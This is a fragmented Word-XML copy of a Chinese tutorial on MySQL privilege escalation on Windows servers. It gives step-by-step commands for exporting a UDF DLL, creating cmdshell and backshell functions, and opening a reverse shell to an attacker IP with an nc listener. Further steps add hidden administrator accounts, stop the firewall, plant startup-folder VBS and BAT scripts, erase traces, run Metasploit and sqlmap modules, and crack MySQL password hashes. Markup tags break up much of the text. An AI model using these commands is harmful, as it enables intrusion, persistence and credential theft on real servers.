      <w:proofErr w:type="gram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利用NTFS ADS流来创建文件夹的方法：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select @@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basedir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; //查找到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的目录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select 'It is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dll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' into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dumpfile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'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录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select 'It is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dll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' into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dumpfile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'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';//利用NTFS ADS创建plugin目录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执行成功以后就会plugin目录，然后再进行导出udf.dll即可。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（3）创建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cmdshell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 xml:space="preserve"> 函数，该函数叫什么名字在后续中则使用该函数进行查询：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create function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cmdshell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returns string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soname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‘lib_mysqludf_sys.dll’;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（4）执行命令：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select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sys_eval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(‘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whoami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’);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一般情况下不会出现创建不成功哦。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连不上3389可以先停止windows防火墙和筛选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select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sys_eval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(‘net stop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policyagent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’);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select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sys_eval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(‘net stop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sharedaccess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’);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udf.dll下常见函数：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lastRenderedPageBreak/>
              <w:t>cmdshell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执行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cmd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downloader 下载者,到网上下载指定文件并保存到指定目录;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open3389 通用开3389终端服务,可指定端口(不改端口无需重启);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backshell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反弹Shell;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ProcessView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枚举系统进程;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KillProcess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终止指定进程;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regread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读注册表;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regwrite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写注册表;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shut 关机,注销,重启;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about 说明与帮助函数;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具体用户示例：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select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cmdshell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('net user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iis_user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123!@#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abcABC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/add');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select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cmdshell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('net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localgroup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administrators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iis_user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/add');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select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cmdshell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('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regedit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/s d:web3389.reg');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select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cmdshell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('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netstat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-an');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（5）清除痕迹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drop function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cmdshell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;//将函数删除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删除udf.dll文件以及其它相关入侵文件及日志。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lastRenderedPageBreak/>
        <w:t>（6）常见错误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1290 - The MySQL server is running with the --secure-file-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priv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option so it cannot execute this statement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在my.ini或者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mysql.cnf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文件中注销 (使用#号) 包含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secure_file_priv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的行(SHOW VARIABLES LIKE “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secure_file_priv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”)。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1123 - Can't initialize function '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backshell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';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UDFs are unavailable with the --skip-grant-tables option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需要将my.ini中的skip-grant-tables选项去掉。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3.webshell下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udf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提权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通过集成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udf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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提权的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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webshell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输入数据库用户名及密码以及数据库服务器地址或者IP通过连接后导出进行提权。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4.Mysql</w:t>
      </w:r>
      <w:proofErr w:type="gram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提权综合利用</w:t>
      </w:r>
      <w:proofErr w:type="gram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工具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v5est0r 写了一个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proofErr w:type="gram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提权综合利用</w:t>
      </w:r>
      <w:proofErr w:type="gram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工具，详细情况请参考其代码共享网站： https://github.com/v5est0r/Python_FuckMySQL其主要功能有：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（1）自动导出你的backdoor和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mof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文件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（2）自动判断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版本，根据版本不同导出UDF的DLL到不同目录，UDF提权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（3）导出LPK.dll文件，劫持系统目录提权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（4）</w:t>
            </w:r>
            <w:proofErr w:type="gram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写启动项提权</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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UdF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自动提权：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python root.py -a 127.0.0.1 -p root -e "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ver&amp;whoami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" -m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udf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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LPK劫持提权：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lastRenderedPageBreak/>
              <w:t>python root.py -a 127.0.0.1 -p root -e "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ver&amp;whoami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" -m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lpk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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启动项提权：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python root.py -a 127.0.0.1 -p root -e "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ver&amp;whoami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" –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mst</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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例如通过LOAD_FILE来查看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配置文件my.ini，如果其中配置了skip-grant-tables，这无法进行提权</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.6.3无法获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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  <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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  <w:t>提权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1.连接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（1）mysql.exe -h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ip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-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uroot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-p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（2）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phpmyadmin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（3）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Navicat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for MySQL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2.查看数据库版本和数据路径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60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SELECT VERSION( );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Select @@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datadir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5.1以下版本，将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dll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导入到c:/windows或者c:/windows/system32/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5.1以上版本 通过以下查询来获取插件路径：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SHOW VARIABLES WHERE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Variable_Name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LIKE "%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dir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";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show variables like '%plugin%' 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select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load_file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('C:/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phpStudy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/Apache/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conf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httpd.conf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')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select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load_file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('C:/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phpStudy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/Apache/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conf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vhosts.conf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')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select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lastRenderedPageBreak/>
              <w:t>load_file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('C:/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phpStudy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/Apache/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conf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/extra/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vhosts.conf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')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select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load_file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('C:/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phpStudy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/Apache/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conf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/extra/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httpd.conf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')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select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load_file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('d:/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phpStudy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/Apache/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conf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vhosts.conf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')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lastRenderedPageBreak/>
        <w:t>3.修改mysql.txt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Mysql.txt为udf.dll的二进制文件转成十六进制代码。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（1）先执行导入ghost表中的内容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 xml:space="preserve">修改以下代码的末尾代码 select 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backshell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(“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YourIP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”,4444);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（2）导出文件到某个目录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1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select data from Ghost into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dumpfile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'c:/windows/mysqldll.dll';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select data from Ghost into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dumpfile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'c:/windows/system32/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mysqldll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';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select data from Ghost into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dumpfile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'c:/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phpStudy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/MySQL/lib/plugin/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mysqldll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';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select data from Ghost into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dumpfile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'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/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mysqldll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';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select data from Ghost into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dumpfile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'C:/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websoft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/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll'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select data from Ghost into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dumpfile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'D:/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phpStudy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/MySQL/lib/plugin/mysqldll.dll';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lastRenderedPageBreak/>
              <w:t xml:space="preserve">select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load_file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('C:/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ProgramData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/MySQL/ MySQL Server 5.1/Data/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user.frm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');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select data from Ghost into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dumpfile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'C:\Program Files\MySQL\MySQL Server 5.1\lib/plugin/mysqldll.dll'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lastRenderedPageBreak/>
        <w:t>（3）查看FUNCTION中是否存在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cmdshell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和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backshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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存在则删除：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drop FUNCTION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cmdshell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;//删除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cmdshell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drop FUNCTION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backshell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;//删除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backshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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创建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backshell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：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CREATE FUNCTION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backshell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RETURNS STRING SONAME 'mysqldll.dll'; //创建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backshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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在具备独立主机的服务器上执行监听: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nc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-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vv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-l -p 44444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执行查询：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select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backshell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("192.192.192.1",44444);//修改192.192.192.1为你的IP和端口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4.获取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webshell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后添加用户命令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注意如果不能直接执行，则需要到c:\windows\system32\下执行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net user antian365 www.xianzhi.aliyun.com /add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net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localgroup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administrators antian365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270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.6.4sqlmap直连数据库提权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Sqlmap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直接连接数据库提权，需要有写入权限和root账号及密码，命令如下：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lastRenderedPageBreak/>
        <w:t>（1）连接数据库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7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sqlmap.py -d "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://root:123456@219.115.1.1:3306/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" --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os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-shell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（2）选择操作系统的架构，32位操作系统选择1，64位选择2.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（3）自动上传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udf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或提示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os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-shell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（4）执行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whomai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命令如果获取系统权限，则</w:t>
      </w:r>
      <w:proofErr w:type="gram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表示提权成功</w:t>
      </w:r>
      <w:proofErr w:type="gram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。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4.msfudf提权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Kali渗透测试平台下执行（kali下载地 https://www.kali.org/downloads/）：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msfconsole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use exploit/windows/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mysql_payload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options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set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rhost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192.168.2.1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set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rport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3306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set username root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set password 123456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run 0或者exploit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msf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下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udf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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提权成功率</w:t>
      </w:r>
      <w:proofErr w:type="gram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并不高，跟windows操作系统版本，权限和数据库版本有关，特别是secure-file-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priv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选项，如果有该选项基本不会成功。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.6.4启动项提权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1.创建表并插入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vbs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脚本到表中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依次使用以下命令：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show databases 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use test;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show tables;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create table a (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cmd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text);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insert into a values ("set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lastRenderedPageBreak/>
              <w:t>wshshell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=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createobject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(""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wscript.shell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"" ) " );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insert into a values ("a=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wshshell.run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(""cmd.exe /c net user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aspnetaspnettest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/add"",0)") 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insert into a values ("b=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wshshell.run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(""cmd.exe /c net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localgroup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Administrators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aspnet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/add"",0) " );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select \ from a;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/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</w:pPr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lastRenderedPageBreak/>
        <w:t>导出</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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vbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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脚本到启动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使用以下命令将刚才在a表中创建的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vbs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脚本导出到启动选项中。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select \ from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a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into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outfile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"C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";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导入成功后，系统重新启动时会自动添加密码为“1”且用户名称为“1”的用户到管理员组中。在实际使用过程中该脚本成功执行的几率比较低，有时候会出现不能导出的错误.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推荐使用以下脚本：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show databases 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use test;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show tables;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create table b (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cmd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text); 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insert into b values ("net user Aspnet123545345! /add");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lastRenderedPageBreak/>
              <w:t xml:space="preserve">insert into b values ("net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localgroup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administrators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Aspnet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/add");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insert into b values ("del b.bat");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select from b into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outfile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"C:\\Documents and Settings\\All Users\\ 「开始」菜单\\程序\\启动\\b.bat";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lastRenderedPageBreak/>
        <w:t>该脚本执行后虽然会闪现Dos窗口，如果有权限导入到启动选项中，则一定会执行成功，在虚拟机中通过MySQL连接器连接并执行以上命令后，在C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录中会有刚才导出的b.bat脚本文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>说明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在不同的操作系统中C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录文件名称可能会不同，这个时候就要将其目录换成相应的目录名称即可。例如如果是英文版本操作系统则其插入的代码为：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select from b into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outfile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"C:\\Documents and Settings\\All Users\\ Start Menu\\Programs\\Startup\\b.bat";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Windows 2008 Server的启动目录为：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C:\\ProgramData\\Microsoft\\Windows \\Start Menu\\Programs\\Startup\\iis.vbs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其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vbs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方法可以参考如下写法：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create table a (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cmd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text);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insert into a values ("set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wshshell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=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createobject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(""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wscript.shell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"" ) " );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insert into a values ("a=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wshshell.run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(""cmd.exe /c net user antian365 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lastRenderedPageBreak/>
              <w:t>qwer1234!@# /add"",0) " );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insert into a values ("b=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wshshell.run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("" cmd.exe /c net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localgroup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Administrators antian365 /add"",0) " );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select \ from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a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into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outfile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"C:\\ProgramData\\Microsoft\\ Windows\\Start Menu\\Programs\\Startup\\iis.vbs";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lastRenderedPageBreak/>
        <w:t>3.msf下模块exploit/windows/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/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mysql_start_up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提权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use exploit/windows/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mysql_start_up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set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rhost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192.168.2.1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set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rport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3306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set username root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set password 123456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run</w:t>
            </w:r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msf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下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mysql_start_up</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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提权有</w:t>
      </w:r>
      <w:proofErr w:type="gram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一定的几率，对英文版系统支持较好。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400"/>
        <w:jc w:val="left"/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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1.7Msf其它相关漏洞提权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1.Mysql身份认证漏洞及利用(CVE-2012-2122)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当连接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MariaDB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/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是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memcmp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()返回</w:t>
      </w:r>
      <w:proofErr w:type="gram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一个非零值</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve">，也会使MySQL认为两个密码是相同的。也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。受影响的产品： All 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MariaDB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 xml:space="preserve"> and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 存在漏洞.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MariaDB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 xml:space="preserve"> versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23不存在漏洞.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 versions from 5.1.63, 5.5.24, 5.6.6 are not不存在漏洞.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4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lastRenderedPageBreak/>
              <w:t>use auxiliary/scanner/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/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mysql_authbypass_hashdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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2.exploit/windows/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/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mysql_yassl_hello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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3.exploit/windows/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mysql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/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scrutinizer_upload_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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400"/>
        <w:jc w:val="left"/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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr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 w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1.8.mysql密码破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.8.1cain工具破解</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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  <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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  <w:t>密码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使用UltraEdit-32编辑器直接打开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user.MYD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文件，打开后使用二进制模式进行查看，在root用户后面是一串字符串，选中这些字符串将其复制到记事本中，这些字符串即为用户加密值，例如506D1427F6F61696B4501445C90624897266DAE3。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注意：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr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root后面的“”不要复制到字符串中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr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在有些情况下需要往后面看看，否则得到的不是完整的MYSQLSHA1密码，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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总之其</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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正确的密码位数是40位。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">工具，使用cracker，右键单击“Add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tolist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hashes</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>值加入</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>到破解列表中，使用软件中的字典、暴力破解等方式来进行暴力破解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.8.2网站在线密码破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr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cmd5.com破解。将获取的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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值放在cmd5.com网站中进行查询，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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密码一般都是收费的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:left="600" w:hanging="360"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>somd5.com破解。Somd5.com是后面出现的一个免费破解网站，每次破解需要手工选择图形码进行破解，速度快，效果好，只是每次只能破解一个，而且破解一次后需要重新输入验证码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr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  <w:t>1.8.3oclhash破解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hashcat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支持很多种破解算法，免费开源软件，官方网站 https://hashcat.net/hashcat/，破解命令：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lastRenderedPageBreak/>
        <w:t>hashcat64.exe -m 200myql.hashpass.dict //破解MySQL323类型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hashcat64.exe -m 300myql.hashpass.dict //破解MySQL4.1/MySQL5类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.8.4 John the Ripper password cracker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:firstLine="390"/>
        <w:jc w:val="left"/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</w:pPr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John the Ripper下载地址： http://www.openwall.com /john/h/john179w2.zip，John the Ripper除了能够破解</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C304D5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>外，还能破解多种格式的密码。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="3000" w:type="pct"/>
        <w:jc w:val="center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0"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C304D5" w:rsidRPr="00C304D5" w:rsidTr="00C304D5">
        <w:trPr>
          <w:trHeight w:val="37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4D5" w:rsidRPr="00C304D5" w:rsidRDefault="00C304D5" w:rsidP="00C304D5">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="left"/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</w:pP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Echo 81F5E21E35407D884A6CD4A731AEBFB6AF209E1B&gt; hashes.txt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>John –format =mysql-sha1 hashes.txt</w:t>
            </w:r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br/>
              <w:t xml:space="preserve">john --list=formats |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grep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 xml:space="preserve"> //查看支持</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C304D5">
              <w:rPr>
                <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="4F4F4F"/>
                <w:spacing w:val="8"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>密码破解的算法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003B519C" w:rsidRPr="00C304D5" w:rsidRDefault="003B519C">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="003B519C" w:rsidRPr="00C30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77189"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3F06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75026F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC6AF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F082A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3B6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3631C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFB4A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4332F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8A0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45A5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EEC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1">
      <w:lvl w:ilvl="1">
        <w:numFmt w:val="decimal"/>
        <w:lvlText w:val="%2."/>
        <w:lvlJc w:val="left"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1">
        <w:numFmt w:val="decimal"/>
        <w:lvlText w:val="%2."/>
        <w:lvlJc w:val="left"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
    <w:lvlOverride w:ilvl="1">
